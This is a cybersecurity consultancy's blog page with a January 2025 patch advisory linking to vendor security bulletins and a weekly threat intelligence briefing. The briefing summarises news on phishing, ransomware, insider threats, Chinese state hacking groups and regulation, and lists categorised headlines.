Threat Intelligence Blog

Contact us to discuss any insights from our Blog, and how we can support you in a tailored threat intelligence report.

Black Arrow Admin

Black Arrow Cyber Advisory 15 January 2025 – Microsoft, Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall, Zyxel, Google Chrome and Zoom Security Updates - updated

Black Arrow Cyber Advisory 15 January 2025 – Microsoft, Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall and Zyxel Security Updates

Updated

Since writing, further updates have been released for another Ivanti vulnerability, this time affecting Endpoint Manager, as well as updates for Google Chrome, to address 132 fixes and 16 unique security issues, and Zoom, to address a number of security issues across Windows, Mac and Linux clients.

See more details on each of those in the relevant sections below.

Executive Summary

Microsoft’s Patch Tuesday for January 2025 started the year with security updates for 159 flaws, including eight zero-day vulnerabilities, with three actively exploited in attacks. This Patch Tuesday also included fixes for twelve critical vulnerabilities, including information disclosure, privileges elevation, and remote code execution flaws.

Several other major software and hardware vendors released critical security updates this month to address vulnerabilities that could be exploited by attackers. Adobe issued updates for popular products such as Photoshop, Illustrator for iPad, and Animate, while Cisco addressed issues across multiple tools, including ThousandEyes and Crosswork Network Controller. Ivanti and Fortinet tackled zero-day vulnerabilities actively exploited in attacks, with Ivanti focusing on Connect Secure and Fortinet on its FortiOS and FortiProxy platforms.

What’s the risk to me or my business?

The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisation's data on the affected systems.

What can I do?

Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and for all other vulnerabilities that have a critical or high severity rating.

Microsoft

Further details on specific updates within this Microsoft Patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan

Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall & Zyxel - updated to include Google Chrome and Zoom

Further details of the vulnerabilities in affected Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall, Zyxel, Google Chrome and Zoom products can be found here:

https://helpx.adobe.com/security/security-bulletin.html

https://sec.cloudapps.cisco.com/security/center/publicationListing.x

https://www.ivanti.com/blog/january-security-update

https://community.fortinet.com/t5/FortiGate/Technical-Tip-Upgrade-to-FortiOS-7-0-17-to-resolve-vulnerability/ta-p/370334

https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/

https://support.sap.com/en/my-support/knowledge-base/security-notes-news/january-2025.html

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003

https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-improper-privilege-management-vulnerability-in-aps-and-security-router-devices-01-14-2025

https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop_14.html

https://www.zoom.com/en/trust/security-bulletin/?cms_guid=false&lang=en-US

#threatadvisory #threatintelligence #cybersecurity

Black Arrow Admin

Black Arrow Cyber Threat Intelligence Briefing 10 January 2025

Black Arrow Cyber Threat Intelligence Briefing 10 January 2025:

-Phishing Click Rates Triple in 2024

-What Boards Need to Know on Digital and Cyber Security Governance In 2025

-Only 26% of Europe’s Top Companies Earn a High Rating for Cyber Security

-Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape

-Ransomware Shock: $133 Million Paid, 195 Million Records Compromised

-Operational Incident Reporting: UK Financial Regulators Propose New Rules

-Insider Threat: Tackling the Complex Challenges of the Enemy Within

-The Big Question: Are Businesses Now in the Front Line for Cyber Warfare?

-How Cyber Security Jargon Creates Barriers and Wastes Resources

-Scammers Exploit Microsoft 365 to Target PayPal Users

-Five Ways to Make Cyber Security Resilience More Than Just a Buzzword

-Meet the Chinese ‘Typhoon’ Hackers Preparing for War

-The Cyber Security Priorities For 2025: What Leaders Should Focus On

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.

Exec Summary

Cyber security remains a critical priority for organisations in 2025, with evolving threats demanding stronger leadership, governance, and proactive resilience measures. Phishing click rates surged by 190% in 2024, with cloud applications as primary targets and a shift in attack vectors from email to search engines and malicious ads. Meanwhile, ransomware inflicted $133.5 million in payouts, and insider threats posed complex risks, exacerbated by generative AI-enabled scams. Addressing these challenges requires a combination of advanced defences like zero trust architectures, improved governance frameworks, and clarity in communication to bridge knowledge gaps at the board level.

Governance is under heightened scrutiny as systemic risks grow. Only 26% of Europe’s top companies earned high ratings for cyber security resilience, while regulatory pressures, such as the EU’s DORA, underline the urgency for improved third-party risk management and operational resilience. Boards must prioritise expertise, particularly in AI, as gaps persist despite incremental progress. Leaders should integrate risk management across infrastructures to address geopolitical cyber warfare threats, emphasising supply chain security and AI-driven defences.

To sustain resilience, organisations must embed adaptability, automate responses, and foster cross-departmental collaboration. Strategic investments in skilled talent, incident readiness, and emerging technologies will help to ensure businesses not only survive but thrive amidst escalating cyber threats.


Top Cyber Stories of the Last Week

Phishing Click Rates Triple in 2024

Phishing click rates surged by 190% in 2024, with over eight in 1,000 users clicking phishing links monthly, according to Netskope. Cloud applications were the top targets (27%), primarily aiming to compromise accounts for illicit resale, of which Microsoft was the most targeted brand (42% of clicks), followed by banking (17%) and telco (13%) sectors. A shift was noted in phishing link locations from email-based attacks to search engines using SEO poisoning and malicious ads. Meanwhile, workplace adoption of GenAI apps rose to 94%, with organisations implementing controls such as app blocking (73%) and data loss prevention (45%).

What Boards Need to Know on Digital and Cyber Security Governance In 2025

In 2025, boardroom oversight of digital and cyber security will face increased scrutiny and expectations as systemic risks continue to grow. In 2024, cyber incidents cost UnitedHealth Group $2.5 billion and drove a 40% stock price drop at CrowdStrike, underlining the escalating consequences of poor governance. While 25% of S&P 500 directors now have cyber security expertise, up from 12% in 2020, gaps remain: 79% of boards report limited or no AI experience. Regulatory pressure, such as the European Central Bank (ECB) mandating cyber expertise for bank boards, and frameworks like NIST CSF 2.0, signal the shift towards systemic reforms in boardroom governance.

Only 26% of Europe’s Top Companies Earn a High Rating for Cyber Security

A report by SecurityScorecard reveals that only 26% of Europe’s top 100 companies earn an A rating for cyber security resilience, with organisations rated A being 13.8 times less likely to experience a breach than those rated F. Some 98% of European companies faced third-party breaches in the past year, and 18% reported direct breaches, exposing gaps in internal defences. The energy sector lags significantly, with 75% of companies rated C or lower, while Scandinavian firms lead with only 20% scoring below B. As the EU’s DORA deadline looms, prioritising third-party risk management is critical for strengthening operational resilience.

Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape

Organisations must now recognise that breaches are highly prevalent in today’s threat landscape, driven by increasingly sophisticated cyber attacks. Traditional perimeter-based defences, while essential, are no longer sufficient on their own. To mitigate the impact of inevitable breaches, adopting a zero trust approach and embedding microsegmentation can limit attackers’ movement within a network, reducing harm and operational disruption. While implementing such strategies demands cross-departmental collaboration and mindset shifts, gradual adoption can ease operational impacts. By becoming ‘breach ready’, organisations can maintain resilience, protect their reputation, and safeguard business continuity even in the face of persistent threats.

Ransomware Shock: $133 Million Paid, 195 Million Records Compromised

Ransomware continues to pose a significant threat to organisations globally, with a 2024 report revealing over 1,200 confirmed attacks and more than 195 million records compromised. Ransom payments reached $133.5 million, with an average payout of $9.5 million. Key sectors affected include business, healthcare, and government, while education saw a slight decline in incidents. Despite early signs of decreasing activity, ransomware attacks surged towards the end of the year, and experts warn of continued large-scale disruptions and data breaches in 2025. The lack of mandatory reporting in many regions further obscures the true scale of the threat.

Operational Incident Reporting: UK Financial Regulators Propose New Rules

UK financial regulators, including the FCA and PRA, are consulting on new operational incident reporting rules to strengthen operational resilience across the financial sector. The proposals aim to clarify when and how firms must report incidents such as IT outages or cyber attacks, focusing on consumer harm, market integrity, and safety risks. Firms would need to submit initial, intermediate, and final reports for each incident. Additionally, material third-party arrangements would require annual updates. These changes align with international standards like the EU’s DORA, and regulators may pursue enforcement for non-compliance. The consultation closes in March 2025.

Insider Threat: Tackling the Complex Challenges of the Enemy Within

Insider threats represent a growing challenge for organisations, with risks ranging from financial fraud and intellectual property theft to national security breaches. High-profile cases demonstrate how malicious insiders, such as bribed employees or malcontent staff, exploit weak detection systems. Sophisticated hiring scams, including the use of false identities, are increasingly enabled by generative AI. Prevention efforts include robust background checks, network anomaly detection, and sentiment analysis, but these methods are not foolproof. As technology evolves, organisations must balance effective detection with legal and ethical considerations to mitigate these complex and evolving risks.

The Big Question: Are Businesses Now in the Front Line for Cyber Warfare?

Recent reports highlight a growing shift towards cyber warfare, with businesses increasingly on the frontline of nation-state cyber attacks. The evolving threat landscape is driven by geopolitical tensions, with critical infrastructure, supply chains, and even civilian services becoming primary targets. Experts warn of a rise in AI-driven cyber weapons capable of bypassing defences and amplifying the scale of attacks. Organisations face heightened risks as ransomware evolves into a political weapon and the proliferation of IoT devices creates new vulnerabilities. A unified approach to security, integrating risk management across infrastructures, is essential to address the escalating threats in 2025.

How Cyber Security Jargon Creates Barriers and Wastes Resources

The cyber security industry, growing at 20% year-on-year, faces a critical communication challenge. Over-reliance on jargon and acronyms hinders understanding and creates barriers, particularly at the board level. Complex terms often obscure what tools do, limiting funding and leaving organisations vulnerable to cyber attacks. A shift toward clear, actionable language, focusing on securing source code, runtime applications, cloud environments, and supply chains, can break down silos and improve integration into development processes. By fostering clarity and inclusivity, organisations can better align security strategies with business priorities, ensuring both protection and efficiency.

Scammers Exploit Microsoft 365 to Target PayPal Users

Fortinet has identified a phishing attack exploiting PayPal's money request feature, leveraging Microsoft 365's Sender Rewrite Scheme (SRS) to bypass email authentication and deceive recipients. The scam involves legitimate-looking payment requests, making them hard to distinguish from genuine communications. Victims who follow the provided link risk granting scammers access to their PayPal accounts. Fortinet highlights the importance of employee education, robust data loss prevention (DLP) rules, and advanced AI-driven detection tools to identify unusual patterns, such as group messaging anomalies, and mitigate these increasingly sophisticated threats. Organisations must prioritise vigilance and proactive defences to combat such risks.

Five Ways to Make Cyber Security Resilience More Than Just a Buzzword

Organisations must shift from reactive approaches to a sustainable cyber security strategy to build true resilience. This means not just addressing immediate threats but embedding adaptability into core systems, enabling defences to evolve with emerging risks. Key measures include automating responses for agility, implementing zero trust architectures, and continuously improving through learning and self-healing mechanisms. By prioritising proactive preparation and fostering a culture of shared responsibility, businesses can move beyond survival to thrive amidst uncertainty, ensuring their defences are robust, adaptable, and future proof.

Meet the Chinese ‘Typhoon’ Hackers Preparing for War

Chinese state-sponsored hacking groups, labelled collectively as the "Typhoon" family, have emerged as a significant cyber security threat to the West, targeting critical infrastructure sectors like water, energy, and transportation. These groups, including Volt Typhoon, Flax Typhoon, and Salt Typhoon, have engaged in deep infiltration to prepare for potential disruptive cyber attacks. Notable incidents include the dismantling of botnets used to mask malicious activities, with over 100 intrusions identified by early 2025. Recent breaches by Salt Typhoon targeted telecoms, exposing sensitive communications data, including law enforcement surveillance systems, underscoring the escalating strategic risks posed by these operations.

The Cyber Security Priorities For 2025: What Leaders Should Focus On

A recent analysis highlights the evolving cyber security priorities for 2025, emphasising the critical role of leadership in driving resilience. As cyber threats become increasingly sophisticated, AI-driven attacks and supply chain vulnerabilities are top concerns, alongside stricter data privacy regulations. Leaders are encouraged to adopt zero trust principles, invest in skilled talent, and align security strategies with business objectives. Preparing for quantum computing’s impact on encryption is also vital. Practical steps include regular incident response testing, vendor risk assessments, and fostering a security-first culture. Effective leadership can turn robust cyber security into a competitive advantage.

Sources:

https://www.infosecurity-magazine.com/news/phishing-click-rates-triple/

https://www.forbes.com/sites/bobzukis/2025/01/09/what-boards-need-to-know-on-digital-and-cybersecurity-governance-in-2025/

https://www.helpnetsecurity.com/2025/01/06/european-companies-cybersecurity-rating/

https://securityboulevard.com/2025/01/breach-readiness-elevating-your-security-posture-in-a-constantly-evolving-threat-landscape/

https://www.forbes.com/sites/daveywinder/2025/01/09/ransomware-shock-133-million-paid-195-million-records-compromised/

https://www.jdsupra.com/legalnews/operational-incident-reporting-uk-2347989/

https://www.securityweek.com/insider-threat-tackling-the-complex-challenges-of-the-enemy-within/

https://www.emergingrisks.co.uk/the-big-question-are-businesses-now-in-the-front-line-for-cyberwarfare/

https://www.techradar.com/pro/how-cybersecurity-jargon-creates-barriers-and-wastes-resources

https://www.infosecurity-magazine.com/news/scammers-exploit-microsoft365/

https://www.scworld.com/perspective/five-ways-to-make-cybersecurity-resilience-more-than-just-a-buzzword

https://techcrunch.com/2025/01/06/meet-the-chinese-typhoon-hackers-preparing-for-war/

https://www.forbes.com/sites/andrewhayeurope/2025/01/06/the-cybersecurity-priorities-for-2025-what-leaders-should-focus-on/



Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Shock—$133 Million Paid, 195 Million Records Compromised

Ransomware attacks against critical infrastructure exceed 2K in a decade | SC Media

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Important Preventative Strategies For Avoiding And Recovering From Ransomware Threats

Space Bears Ransomware: What You Need To Know | Tripwire

Ransomware attacks on education declined in 2024, report shows | StateScoop

How to Protect Against Ransomware: Everything You Need to Know

Ransomware Victims

New York Hospital Says Ransomware Attack Data Breach Impacts 670,000 - SecurityWeek

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

PowerSchool Reportedly Pays Ransom to Prevent Student Data Leak - Infosecurity Magazine

IT Giant Atos Responds to Ransomware Group's Data Theft Claims - SecurityWeek

Hackers release files stolen in cyberattack on Rhode Island benefits system | StateScoop

Dental Practice Pays State in Alleged Data Breach 'Cover Up'

American Addiction Centers Hit with PHI Breach Class Action | Robinson+Cole Data Privacy + Security Insider - JDSupra

Almost 8500 People Affected By Casio Data Leak

Ransomware Targeting Infrastructure Hits Telecom Namibia

Phishing & Email Based Attacks

Phishing Click Rates Triple in 2024 - Infosecurity Magazine

The top target for phishing campaigns - Help Net Security

iPhones more affected than Android smartphones by a certain kind of cyber attack - NotebookCheck.net News

Meet PhishWP – The New WordPress Plugin That’s Turning Legit Sites into Phishing Traps - Security Boulevard

Russian hackers turn trusted online stores into phishing pages | CSO Online

Fortinet warns of sophisticated phishing campaign exploiting Microsoft 365 domains - SiliconANGLE

Scammers Exploit Microsoft 365 to Target PayPal Users - Infosecurity Magazine

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

How to protect yourself from phishing attacks in Chrome and Firefox | ZDNET

Other Social Engineering

Fake Government Officials Use Remote Access Tools for Card Fraud - Infosecurity Magazine

Artificial Intelligence

Report: AI and security governance remain top priorities for 2025 - SD Times

Google Chrome AI extensions deliver info-stealing malware in broad attack | Malwarebytes

Cloud, AI, and cybersecurity converge on fintech landscape | SC Media

A NATO-backed startup says agentic malware could be here as soon as 2027

New AI Challenges Will Test CISOs & Their Teams in 2025

UK Government to Ban Creation of Explicit Deepfakes - Infosecurity Magazine

Deepfake advancements pose growing cyber security risks

How will the evolution of AI change its security? | TechRadar

Trolley Problem, Safety Versus Security of Generative AI - SecurityWeek

Why an “all gas, no brakes” approach for AI use won't work - Help Net Security

Innovation, Automation, And The Cyber Security Challenges Ahead

Malware

Google Chrome AI extensions deliver info-stealing malware in broad attack | Malwarebytes

A NATO-backed startup says agentic malware could be here as soon as 2027

Over 4,000 backdoors hijacked by registering expired domains

New Banshee Malware Targeting MacOS Users Remained Undetected For Months

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

PLAYFULGHOST Delivered via Phishing and SEO Poisoning in Trojanized VPN Apps

A Windows filetype update may have complicated cyber threat detection efforts | TechRadar

New Infostealer Campaign Uses Discord Videogame Lure - Infosecurity Magazine

Wallet Drainer Malware Used to Steal $500 Million in Cryptocurrency in 2024 - SecurityWeek

When Is A RAT, Not A RAT?

Researchers Expose NonEuclid RAT Using UAC Bypass and AMSI Evasion Techniques

Google warns of legit VPN apps being used to infect devices with malware | TechRadar

Top 5 Malware Threats to Prepare Against in 2025

Fake Government Officials Use Remote Access Tools for Card Fraud - Infosecurity Magazine

Advanced evasion techniques leveraged by novel NonEuclid RAT | SC Media

Bots/Botnets

US Sanctions Chinese Cybersecurity Firm for Global Botnet Attacks - Infosecurity Magazine

New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices - Infosecurity Magazine

Gayfemboy Botnet targets Four-Faith router vulnerability

Mobile

FireScam Malware Campaign Highlights Rising Threat To Mobile Users

iPhones more affected than Android smartphones by a certain kind of cyberattack - NotebookCheck.net News

Candy Crush, Tinder, MyFitnessPal: See the Thousands of Apps Hijacked to Spy on Your Location

Millions of Vinted, Spotify and Tinder users' data could be compromised in global hack

Porn Ban—New Threat For iPhone, iPad, Android Users

Data Privacy: Your Carrier Knows a Lot About You. Here's How to Take Back Control - CNET

Android patches several vulnerabilities in first security update of 2025 | CyberScoop

This iOS 18 feature shares your photos with Apple for analysis. Should you be worried? | ZDNET

Android Under Attack—Users Warned As FireScam Threat Evades Detection

Apple rolls out mystery update with 'important bug fixes' for iPhones and iPads | ZDNET

First Android Update of 2025 Patches Critical Code Execution Vulnerabilities - SecurityWeek

Denial of Service/DoS/DDoS

Japanese Businesses Hit By a Surge In DDoS Attacks

Internet of Things – IoT

IoT's Regulatory Reckoning Is Overdue

Buying a smart home device? Look for this new cybersecurity seal - here's why | ZDNET

White House launches cybersecurity label program for consumers | CyberScoop

New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices - Infosecurity Magazine

Gayfemboy Botnet targets Four-Faith router vulnerability

How vulnerable Ecovacs robot vacuums are being hacked | Kaspersky official blog

Tesla data helped police in Las Vegas. It highlights privacy concerns | AP News

Data Breaches/Leaks

Candy Crush, Tinder, MyFitnessPal: See the Thousands of Apps Hijacked to Spy on Your Location

Millions of Vinted, Spotify and Tinder users' data could be compromised in global hack

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

PowerSchool Reportedly Pays Ransom to Prevent Student Data Leak - Infosecurity Magazine

The real cost of data breaches for businesses - Help Net Security

CISA says Treasury was the only US agency breached via BeyondTrust - Help Net Security

UN's aviation agency confirms attack on recruitment database • The Register

Largest US addiction treatment provider notifies patients of data breach

How to empower employees to prevent data leaks | Professional Security Magazine

Washington Attorney General Sues T-Mobile Over 2021 Data Breach - SecurityWeek

Dental group lied through teeth about data breach, fined $350,000 | Malwarebytes

UN aviation agency 'actively investigating' cyber criminal’s claimed data breach | The Record from Recorded Future News

Hackers Claim Massive Breach of Location Data Giant, Threaten to Leak Data

American Addiction Centers Hit with PHI Breach Class Action | Robinson+Cole Data Privacy + Security Insider - JDSupra

Medical billing firm Medusind discloses breach affecting 360,000 people

Excelsior Orthopaedics Data Breach Impacts 357,000 People - SecurityWeek

Mortgage Cos. Fined $20M Over Cybersecurity Breach - Law360

Almost 8500 People Affected By Casio Data Leak

Organised Crime & Criminal Actors

Malicious hackers have their own shadow IT problem | CyberScoop

Web3 Attacks Result in $2.3Bn in Cryptocurrency Losses - Infosecurity Magazine

Torturing hackers in prison: surviving as an act of protest | Cybernews

CISOs’ Top Cyber Security Threats 2025: Scattered Spider, Deepfakes, and More - Security Boulevard

Cyber Criminals Don't Care About National Cyber Policy

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Cryptocurrency wallet drainers stole $494 million in 2024

Wallet Drainer Malware Used to Steal $500 Million in Cryptocurrency in 2024 - SecurityWeek

Insider Risk and Insider Threats

Insider Threat: Tackling the Complex Challenges of the Enemy Within - SecurityWeek

83% of organizations reported insider attacks in 2024

Internal threats in the cloud | Professional Security Magazine

How to empower employees to prevent data leaks | Professional Security Magazine

How can organizations mitigate the security risks caused by human error?

Supply Chain and Third Parties

Widespread cyberattack targets Google Chrome extensions, compromises 2.6 million devices | TechSpot

Chrome Compromises Highlight Software Supply Challenges

OpenAI Blames Cloud Provider For ChatGPT Outage

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

CISA says Treasury was the only US agency breached via BeyondTrust - Help Net Security

Cloud/SaaS

Cloud, AI, and cyber security converge on fintech landscape | SC Media

Internal threats in the cloud | Professional Security Magazine

OpenAI Blames Cloud Provider For ChatGPT Outage

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Fortinet warns of sophisticated phishing campaign exploiting Microsoft 365 domains - SiliconANGLE

Scammers Exploit Microsoft 365 to Target PayPal Users - Infosecurity Magazine

MSSPs Have a Role in Stopping Cloud Attacks Using Stolen Credentials | MSSP Alert

Unconventional Cyber Attacks Aim for PayPal Account Takeover

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Outages

OpenAI Blames Cloud Provider For ChatGPT Outage

Proton Mail still down as Proton recovers from worldwide outage

CrowdStrike bounces back after triggering largest IT outage in history

Identity and Access Management

Identity Security to Become a Focus in 2025, Experts Say | MSSP Alert

The Benefits of Implementing Least Privilege Access - Security Boulevard

Encryption

Around 3.3M POP3 and IMAP mail servers lack TLS encryption

Millions of email users at risk — passwords could be exposed to hackers, experts warn | Tom's Guide

Making the most of cryptography, now and in the future - Help Net Security

How to password protect a USB stick in less than 5 minutes - Which? News

Encryption backdoor debate 'done and dusted' • The Register

Mixed Messages: The Salt Typhoon Encryption Debacle | Benesch - JDSupra

How to encrypt any email - in Outlook, Gmail, and other popular services | ZDNET

Linux and Open Source

Open source worldwide: Critical maintenance gaps exposed - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

Router reality check: 86% of default passwords have never been changed

MSSPs Have a Role in Stopping Cloud Attacks Using Stolen Credentials | MSSP Alert

Almost half Gen Z and Millennials have had their social media passwords hacked

Critical ‘Rising Risk’ Attack Alert—Change Your Router Password Now

Social Media

Meta ditches fact checking for community notes - just like on X | ZDNET

TikTok Ban Thrusts Apple (AAPL), Google Into US-China Geopolitical Fray - Bloomberg

E.U. Commission Fined for Transferring User Data to Meta in Violation of Privacy Laws

Almost half Gen Z and Millennials have had their social media passwords hacked

New Infostealer Campaign Uses Discord Videogame Lure - Infosecurity Magazine

Mark Zuckerberg Says Meta Fact-Checkers Were the Problem. Fact-Checkers Rule That False. - The New York Times

UK universities join retreat from Elon Musk's X, citing misinformation on platform | Reuters

EU Commission urged to act over Elon Musk’s ‘interference’ in elections | European Union | The Guardian

Meta exempted top advertisers from standard content moderation process

Meta Now Lets Users Say Gay and Trans People Have ‘Mental Illness’ | WIRED

Training, Education and Awareness

How to empower employees to prevent data leaks | Professional Security Magazine

8 Tips for Fortifying Your Cyber Defenses With a Human Firewall

Regulations, Fines and Legislation

New HIPAA Security Rules Pull No Punches

Cyber security law updates in the UK and the EU | Technology Law Dispatch

Operational Incident Reporting: UK Financial Regulators Propose New Rules | A&O Shearman - JDSupra

IoT's Regulatory Reckoning Is Overdue

Proposed Updates to HIPAA Security Rule Would Require Entities to Adopt Enhanced Cybersecurity Measures | Fisher Phillips - JDSupra

White House launches cyber security label program for consumers | CyberScoop

UK Government to Ban Creation of Explicit Deepfakes - Infosecurity Magazine

A Year in Privacy and Security: Privacy Violations, Large-Scale Data Breaches, and Big Fines and Settlements | Robinson+Cole Data Privacy + Security Insider - JDSupra

Cyber criminals Don't Care About National Cyber Policy

Dental group lied through teeth about data breach, fined $350,000 | Malwarebytes

Dental Practice Pays State in Alleged Data Breach 'Cover Up'

Mortgage Cos. Fined $20M Over Cyber Security Breach - Law360

US has ‘a lot of work to do’ on network defences, departing cyber czar says - Defense One

Models, Frameworks and Standards

New HIPAA Security Rules Pull No Punches

Proposed Updates to HIPAA Security Rule Would Require Entities to Adopt Enhanced Cybersecurity Measures | Fisher Phillips - JDSupra

E.U. Commission Fined for Transferring User Data to Meta in Violation of Privacy Laws

The ongoing evolution of the CIS Critical Security Controls - Help Net Security

The NIS2 Directive in Germany: Looking Ahead | Hogan Lovells - JDSupra

Data Protection

Huge Changes Predicted For The Data Privacy Landscape

Careers, Working in Cyber and Information Security

It’s Time Businesses Address The UK’s Cybersecurity Talent Shortage

Helping Veterans Transition to Civilian Life: How Employers Can Tap into the Cybersecurity Talent Pool - ClearanceJobs

Law Enforcement Action and Take Downs

Sharing of Telegram User Data Surged After CEO Arrest

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Misinformation, Disinformation and Propaganda

Meta ditches fact checking for community notes - just like on X | ZDNET

Mark Zuckerberg Says Meta Fact-Checkers Were the Problem. Fact-Checkers Rule That False. - The New York Times

UK universities join retreat from Elon Musk's X, citing misinformation on platform | Reuters

EU Commission urged to act over Elon Musk’s ‘interference’ in elections | European Union | The Guardian

Meta exempted top advertisers from standard content moderation process

Meta Now Lets Users Say Gay and Trans People Have ‘Mental Illness’ | WIRED


Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Historical Warfare’s Parallels with Cyber Warfare - Australian Cyber Security Magazine

Preparing for Cybergeddon - defenceWeb

The Big Question: Are businesses now in the front line for cyberwarfare? - Emerging Risks Media Ltd

Shadows Of Power: Navigating The Complexities Of Global Security – Analysis – Eurasia Review

Nation State Actors

China

Meet the Chinese 'Typhoon' hackers preparing for war | TechCrunch

How Chinese Hackers Graduated From Clumsy Corporate Thieves to Military Weapons - WSJ

China cyber threats: What businesses can do to protect themselves | ITPro

Chinese hackers ran amok in US telecom network for 18 months -- got info on over 1 million people: report

China Protests US Sanctions for Its Alleged Role in Hacking, Complains of Foreign Hacker Attacks - SecurityWeek

UK cyber experts on red alert after Salt Typhoon attacks on US telcos | ITPro

China’s escalating cyber attacks highlight Biden, Trump differences - Defense One

Hackers Terrify US Intelligence After Infiltrating Guam - Bloomberg

After China's Salt Typhoon, the reconstruction starts now • The Register

U.S. uncovers hacking campaign targeting Guam's critical infrastructure — suspected Chinese Volt Typhoon hacks could disrupt the defense of Taiwan | Tom's Hardware

FCC chief urges auction to fund 'Rip and Replace' program • The Register

Japanese police claim China ran five-year cyberattack • The Register

Mandiant links Ivanti zero-day exploitation to Chinese hackers | TechTarget

46 Japanese entities hit by cyberattacks since year-end - Japan Today

US-China: A Cyberwar With Internet Agents – OpEd – Eurasia Review

Taiwan claims China-linked ship damaged submarine cable • The Register

Taiwan raises alarm over increasing Chinese cyberattacks | Taiwan News | Jan. 5, 2025 15:31

TikTok Ban Thrusts Apple (AAPL), Google Into US-China Geopolitical Fray - Bloomberg

Mixed Messages: The Salt Typhoon Encryption Debacle | Benesch - JDSupra

China hits Lockheed Martin, Raytheon and Boeing with export ban after US arms sales to Taiwan | The Independent

The US just added Tencent — which backs US startups — to its list of 'Chinese military' companies | TechCrunch

Chinese APT Exploits Versa Networks Zero-Day Flaw | Decipher

Russia

WordPress phishing plugin drives online shopping fraud | SC Media

Russian hackers turn trusted online stores into phishing pages | CSO Online

Banshee: The Stealer That "Stole Code" From MacOS XProtect - Check Point Research

Cyber attacks on Ukraine in 2024: a 70% increase

Russian internet provider confirms its network was ‘destroyed’ following attack claimed by Ukrainian hackers | The Record from Recorded Future News

'Russia's Google' Yandex ordered to hide maps of oil refineries after Ukrainian attacks

Hackers claim to have breached Russia’s real estate database, Moscow denies

Ukrainian hackers take credit for hacking Russian ISP that wiped out servers and caused internet outages | TechCrunch


Tools and Controls

Rethinking Incident Response: How Organizations Can Avoid Budget Overruns and Delays  - Security Boulevard

Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape  - Security Boulevard

Why Small Business Can't Rely Solely on AI to Combat Threats

Around 3.3M POP3 and IMAP mail servers lack TLS encryption

Confidently Secure: Leveraging PAM for Enhanced Protections - Security Boulevard

How to empower employees to prevent data leaks | Professional Security Magazine

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

90 Percent of Business Leaders Lack Faith in AI-driven Cyber Security Solutions, Arelion Report Reveals

Identity Security to Become a Focus in 2025, Experts Say | MSSP Alert

From Silos to Synergy: Transforming Threat Intelligence Sharing in 2025 - SecurityWeek

Top 6 Ways To Back Your Business Up With Cyber Threat Intelligence

Innovation, Automation, And The Cyber Security Challenges Ahead

The Benefits of Implementing Least Privilege Access - Security Boulevard

Cybersecurity in 2025: Agentic AI to change enterprise security and business operations in year ahead | SC Media

Best of 2024: If You are Reachable, You Are Breachable, and Firewalls & VPNs are the Front Door  - Security Boulevard

Google warns of legit VPN apps being used to infect devices with malware | TechRadar

Why Traditional Fraud Scores Are No Longer Enough for Modern Threats - Security Boulevard

8 Tips for Fortifying Your Cyber Defenses With a Human Firewall

How CISOs can make smarter risk decisions - Help Net Security
Vulnerability Management

Millions of Windows 10 PCs face security disaster as Microsoft ends support

Key Cyber Initiatives from CISA: KEV Catalog, CPGs, and PRNI | CISA

Vulnerabilities

Security pros baited by fake Windows LDAP exploits • The Register

Thousands of Buggy BeyondTrust Systems Remain Exposed

Tenable Disables Nessus Agents Over Faulty Updates - SecurityWeek

Mandiant links Ivanti zero-day exploitation to Chinese hackers | TechTarget

Android patches several vulnerabilities in first security update of 2025 | CyberScoop

Mitel MiCollab, Oracle WebLogic Server vulnerabilities exploited by attackers - Help Net Security

Chrome 131, Firefox 134 Updates Patch High-Severity Vulnerabilities - SecurityWeek

Surprise Google Chrome 131 Update For Windows, Mac, Linux, Android

Hackers are exploiting a new Ivanti VPN security bug to hack into company networks | TechCrunch

Another top WordPress plugin found carrying critical security flaws | TechRadar

First Android Update of 2025 Patches Critical Code Execution Vulnerabilities - SecurityWeek

WordPress Popular Posts Plugin Vulnerability Affects 100k+ Sites

Popular open source vulnerability scanner Nuclei forced to patch worrying security flaw | TechRadar

Dell, HPE, MediaTek Patch Vulnerabilities in Their Products - SecurityWeek

SonicWall urges admins to patch exploitable SSLVPN bug immediately

Palo Alto Networks Patches High-Severity Vulnerability in Retired Migration Tool - SecurityWeek

Apple rolls out mystery update with 'important bug fixes' for iPhones and iPads | ZDNET

